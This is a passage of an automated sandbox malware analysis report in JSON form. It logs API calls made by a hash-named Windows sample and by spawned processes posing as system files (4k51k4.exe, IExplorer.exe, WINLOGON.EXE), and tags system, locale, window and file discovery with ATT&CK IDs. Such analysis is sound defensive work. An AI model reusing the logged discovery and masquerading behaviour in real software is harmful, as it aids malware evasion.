940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b5600d01b56000016560000005300e4145600880000008800000017686e7798175600ff2b6e77f69e6b77a41b5600ac012f0000002f0000005300c06d53001400980070010000c06d53005016560010000000000000001500930070010000c06d5300 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b3e00d01b3e0000163e0000003b00e4143e00880000008800000017686e7798173e00ff2b6e771c0f7677a41b3e00ac011b0000001b0000003b00c06d3b0016008e009c020000c06d3b0050163e001000000000000000170089009c020000c06d3b00 (UID: 00000000-00006124)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a00100005a1b4701581b470188154701000044016c144701880000008800000017686e7720174701ff2b6e771f9d6b772c1b4701ac011a0000001a0000004401905b44011200a20016040000905b4401d8154701100000000000000013009d0016040000905b4401 (UID: 00000000-00006056)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21be601d01be6010016e6010000e301e414e601880000008800000017686e779817e601ff2b6e77db926b77a41be601ac012e0000002e000000e301c06de30114009800aa000000c06de3015016e601100000000000000015009300aa000000c06de301 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc76789d32000070fd7f9a5c6f7700f0fd7f50c712004470fd7f00000000400000003f000000200000000070fd7f44c71200c15c6f7760827677200000000070fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21bcc01d01bcc010016cc010000c901e414cc01880000008800000017686e779817cc01ff2b6e77e78a6b77a41bcc01ac011700000017000000c901c06dc9011400980066050000c06dc9015016cc0110000000000000001500930066050000c06dc901 (UID: 00000000-00002532)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b2300d01b23000016230000002000e4142300880000008800000017686e7798172300ff2b6e773b8e6b77a41b2300ac0124000000240000002000c06d2000140098001b040000c06d2000501623001000000000000000150093001b040000c06d2000 (UID: 00000000-00003812)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21bc301d01bc3010016c3010000c001e414c301880000008800000017686e779817c301ff2b6e77638f6b77a41bc301ac012300000023000000c001c06dc0011400980050010000c06dc0015016c30110000000000000001500930050010000c06dc001 (UID: 00000000-00002828)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc7658b227000070fd7f9a5c6f7700f0fd7f50c712004470fd7f00000000400000003f0000001f0000000070fd7f44c71200c15c6f77608276771f0000000070fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00002828)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a00100005a1b4601581b460188154601000043016c144601880000008800000017686e7720174601ff2b6e7709836b772c1b4601ac0122000000220000004301905b43011200a200d1040000905b4301d8154601100000000000000013009d00d1040000905b4301 (UID: 00000000-00002852)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21baa01d01baa010016aa010000a701e414aa01880000008800000017686e779817aa01ff2b6e77bd846b77a41baa01ac016200000062000000a701c06da70116008e00e6010000c06da7015016aa01100000000000000017008900e6010000c06da701 (UID: 00000000-00002832)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21bb701d01bb7010016b7010000b401e414b701880000008800000017686e779817b701ff2b6e77c57c7477a41bb701ac012f0000002f000000b401c06db40116008e0066010000c06db4015016b70110000000000000001700890066010000c06db401 (UID: 00000000-00003980)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a00100005a1bc001581bc0018815c0010000bd016c14c001880000008800000017686e772017c001ff2b6e77357c74772c1bc001ac012c0000002c000000bd01905bbd011200a2001b040000905bbd01d815c001100000000000000013009d001b040000905bbd01 (UID: 00000000-00003688)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc7638ba2b000070fd7f9a5c6f7700f0fd7f50c712004470fd7f00000000400000003f000000200000000070fd7f44c71200c15c6f7760827677200000000070fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00002816)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b6300d01b63000016630000006000e4146300880000008800000017686e7798176300ff2b6e77f6717477a41b6300ac012f0000002f0000006000c06d600014009800d1040000c06d600050166300100000000000000015009300d1040000c06d6000 (UID: 00000000-00003528)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b4701d01b47010016470100004401e4144701880000008800000017686e7798174701ff2b6e77136a7477a41b4701ac011b0000001b0000004401c06d440114009800d1040000c06d440150164701100000000000000015009300d1040000c06d4401 (UID: 00000000-00004264)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a00100005a1be001581be0018815e0010000dd016c14e001880000008800000017686e772017e001ff2b6e77b96d74772c1be001ac015f0000005f000000dd01905bdd011200a20019040000905bdd01d815e001100000000000000013009d0019040000905bdd01 (UID: 00000000-00003032)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b3a00d01b3a0000163a0000003700e4143a00880000008800000017686e7798173a00ff2b6e779e6c7477a41b3a00ac0124000000240000003700c06d37001400980019040000c06d370050163a0010000000000000001500930019040000c06d3700 (UID: 00000000-00004280)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005948)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004164)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006056)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002532)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003812)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002852)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002832)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003980)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003688)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003528)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004264)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005064)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"GetWindowTextA\" (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000630054db1200b344cf6b050000000000000000000000000000000000000000000000000000002c0100000000000000000000000000006ce212001914cd2710e0120010e012005ecb97752c01000000000000005d95756ce212000e5d957504de1200dcaa9975010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d262c03be4db12006d8280770c79630004010000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000380038003500320062003800660034003700350034003900380066006300630031006600310037003600650038006200340061003100610035006400650039003200660065003900390064006400300064006200630066003400660039003400330034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b6e773a876b77d8ebbc76ac015f0000005f0000000000000000000000ffff86010000000000000000000000000000000000000100f70086010000000000000000000038705f0000000000200000000000000000000000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006300010000000b00000002000000080000005ad19775d0706300cb7063000000000002000000b88f610000000000010000080000000054ed120095e16a7782531700feffffffccda12003f08597602000000b88f6100000000000100001888fb5876bcda1200c81c997592dc120095fb5876f0db1200b88f610000000000000000000000000078db120000005f007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000e62c03b38db12006d8280770c79630004010000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600266dc03b50d412006d8280776477650004010000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006400a4d01200b344cf6b0900000000000000000000000000000000000000000000000000000080010000000000000000000000000000bcd71200a91ecd2760d5120060d512005ecb97758001000000000000005d9575bcd712000e5d957554d31200dcaa997501000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000268c03b34d112006d8280772c7d650004010000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500003b000000005f0000000000407f650098d0120004646e7738015f00e0636e7702000000b88f6100000000000100000882531700feffffffbcc77677c0c776770a0000004010000000005f00187d6500f83b0000ff07000000005f00000000007f070000c4005f0008305f005934000048d0120067e56b7700005f00187d65000000000000005f00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007e69c03b88d012006d8280772c7d650004010000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000e8856800e3856800000000000000000000005f0000000001d4cc12000000000038da120095e16a7782531700feffffff435c6e7750596e77aa000000b8000000e2856800e08568005cce120094d21200000000000000000000000000000000000000000000000000e018000000005f001c5c6d7760d86975ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096ed6e770a866800a06a4475860000005cce120094d212000000000086008800a06a44755cce1200916c44750a866800a06a4475a06a4475ccd2120002020000 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0054db1200b344cf6b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce21200315ed93b10e0120010e012005ecb97751401000000000000005d95756ce212000e5d957504de1200dcaa9975010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360060b4de3fe4db12006d8280776c592f0004010000 (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"IsWow64Process\" with parameter \"5064\" - (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"6060\" - (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"5888\" - (UID: 00000000-00005888)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"4164\" - (UID: 00000000-00004164)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"4240\" - (UID: 00000000-00004240)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"2828\" - (UID: 00000000-00002828)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"2816\" - (UID: 00000000-00002816)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"3912\" - (UID: 00000000-00003912)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005948)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006124)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006056)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002532)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003812)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002852)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002832)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003980)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003688)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003528)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004264)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003032)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004280)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003912)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000344)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002240)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004132)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003748)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003480)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003560)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001728)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003200)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1224802908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005064)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": 